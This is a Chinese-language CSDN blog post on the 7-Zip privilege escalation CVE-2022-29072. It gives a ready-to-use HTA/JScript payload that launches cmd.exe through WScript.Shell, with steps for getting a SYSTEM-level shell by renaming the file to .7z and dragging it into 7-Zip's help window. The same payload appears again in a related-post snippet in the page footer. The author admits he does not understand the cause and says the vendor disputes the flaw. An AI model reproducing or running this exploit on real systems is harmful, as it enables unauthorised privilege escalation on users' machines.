7-zip权限提升漏洞【CVE-2022-29072】

Iwanturoot

已于 2022-04-22 09:39:46 修改

阅读量1.2k

点赞数 1

分类专栏：漏洞原理 VulnReviewing 内网渗透文章标签： 7zip 权限提升命令执行本地提权 windows

于 2022-04-21 21:14:21 首次发布

本文链接：https://blog.csdn.net/qq_32731075/article/details/124331887

版权

漏洞原理同时被 3 个专栏收录

41 篇文章 9 订阅

订阅专栏

VulnReviewing

32 篇文章 3 订阅

订阅专栏

内网渗透

14 篇文章 1 订阅

订阅专栏

7-zip权限提升漏洞【CVE-2022-29072】

这玩意儿很简单，原理不清楚，不过7-zip官方并不承认这个漏洞，他们说这个洞是微软的锅，不过我看也确实是。

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

找个文本文件把上面的内容写进去，然后讲后缀名改为7z。然后讲这个文件拖动到7zip的helper窗口中就会弹出DOS窗口，查看当前权限可以看到为system权限

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Iwanturoot

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
7-zip权限提升漏洞【CVE-2022-29072】

7-zip权限提升漏洞【CVE-2022-29072】
复制链接

扫一扫

专栏目录

7-Zip提权漏洞相关

weixin_51194266的博客

06-21

1280

2022年4月份7-zip漏洞的简单复现以及查到的瓜说实话瓜的部分多一点（

CVE-2022-29072(7z漏洞复现及对应措施）

qq_43696276的博客

04-23

1733

CVE-2022-29072(7z漏洞复现及对应措施）首先，找个txt文本，将以下代码输入： <html> <head> <HTA:APPLICATION ID="7zipcodeexec"> <script language="jscript"> var c = "cmd.exe"; new ActiveXObject('WScript.Shell').Run(c); </script> <head> <html> 然

1 条评论您还未登录，请先登录后发表或查看评论

7zip CVE漏洞

04-08

7zip的源码文件，7z423.tar.bz2

7-zip 本地提权漏洞（CVE-2022-29072）

murphysec的博客

04-19

2124

CVE-2022-29072漏洞的产生，是由于21.07版本的7-zip中7z.dll 文件中配置错误和堆溢出引起的问题，该问题导致攻击者可以利用此漏洞对用户进行提权操作，该漏洞利用难度低，影响范围广。解决方案：第一种方法：如果 7-zip 没有更新，删除 7-zip.chm 文件就足以关闭漏洞。第二种方法： 7-zip 程序应该只有读取和运行权限。（适用于所有用户）具体复现过程可以参考链接：https://github.com/kagancapar/CVE-2022-29072 编号 CV

Windows CVE-2022-21907漏洞复现

执着

01-20

1万+

测试环境：虚拟机Windows 10 Windows版本：cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso 此次CVE的漏洞是由于HTTP.sys的缓冲区溢出从而导致的拒绝服务，蓝屏重启。微软官方在第一时间修复此漏洞，据微软官方公布的此次漏洞影响范围： Windows Server 2019 (Server Core installation) Windows Server 201..

CVE-2017-12615-master.zip

09-04

CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞，它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码，从而可能导致数据泄露、系统权限提升甚至整个服务器的完全控制。这个漏洞是由于Struts...

CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用

09-23

**CVE-2018-8120详解：Windows LSA权限提升漏洞** CVE-2018-8120是一个针对Windows操作系统的安全漏洞，它属于本地权限提升（Local Security Authority Subsystem Service, LSA）漏洞类型。这个漏洞主要影响Windows...

CVE-2020-1938.zip

04-15

【CVE-2020-1938：Apache Tomcat AJP协议远程代码执行漏洞】 CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞，该漏洞允许攻击者通过AJP（Apache JServ Protocol）接口来实现远程代码执行，从而对目标系统...

WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf

热门推荐

社会人

01-24

2万+

echarts省地图例子以及tooltip自定义提示框详解

拖动文件就能触发 7-Zip 安全漏洞，波及所有版本

m0_46163918的博客

04-19

5083

在 7-Zip 中发现了一个漏洞，该漏洞可能导致黑客被赋予更高的权限以及执行任意指令

7-Zip 发现多个高危漏洞

weixin_34176694的博客

06-02

419

思科Talos安全团队的研究人员报告在流行的开源解压缩工具7-Zip中发现多个可利用的漏洞。7-Zip刚刚释出了最新版的v16.00修复了漏洞，使用7-Zip用户建议尽快升级。研究人员称，7-Zip处理Universal Disk Format(UDF) 文件的方法CInArchive::ReadFileItem存在越界读漏洞，能被任何包含畸形Long ...

浅谈zip格式处理逻辑漏洞

cbbbc

10-22

468

前言：zip压缩格式应用广泛，各个平台都有使用，Windows平台使用来压缩文件，Android平台使用来作为apk文件的格式。由于zip文件格式比较复杂，在解析zip文件格式时，如果处理不当，可能导致一些有意思的逻辑漏洞，本篇文章将挑选有意思的漏洞进行解析。一、文件扩展名欺骗漏洞很早之前，国外安全研究人员爆料Winrar 4.x版本存在文件扩展名欺骗漏洞，黑客可以通过该漏洞诱骗受害者

linux tar 7z,.tar.gz和.gz或.tar.7z和.7z有什么区别？

weixin_42102933的博客

05-14

1668

问题描述最近，我一直在备份大量数据，并且我注意到可以将文件另存为.gz或.tar.gz，或.7z和.tar.7z等。正常的和.tar.*变体之间有什么区别？在制作备份时，他们中的哪一位会被告知？最佳解决办法如果您来自Windows背景，则可能熟悉zip和rar格式。这些是压缩在一起的多个文件的档案。在Unix和Unix-like系统(如Ubuntu)中，归档和压缩是分开的。tar将多个文件放入一个...

【安全预警】WINRAR，7ZIP,WINZIP等存在严重漏洞

皮皮王的专栏

02-21

1752

【漏洞说明】 WinRAR等被曝严重安全漏洞，该漏洞可被攻击者绕过权限提升就能运行WinRAR，而且可以直接将恶意文件放进Windows系统的启动文件夹中。这就意味着当用户下次重新开机的时候，这些恶意文件就能自动运行，让攻击者“完全控制”受害者的计算机。目前全球有超过5亿用户受到WinRAR漏洞影响。（7ZIP,WINZIP等同样存在类似问题）【预防办法】 1.不要下载不明来历软件...

Apache Spark 命令注入（CVE-2022-33891）格式化文档

08-10

Apache Spark 命令注入漏洞（CVE-2022-33891） Apache Spark 命令注入漏洞（CVE-2022-33891）是 Apache Spark 中的一种高危漏洞，允许攻击者通过命令注入来执行恶意命令，从而控制服务器。该漏洞影响 Apache Spark ...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交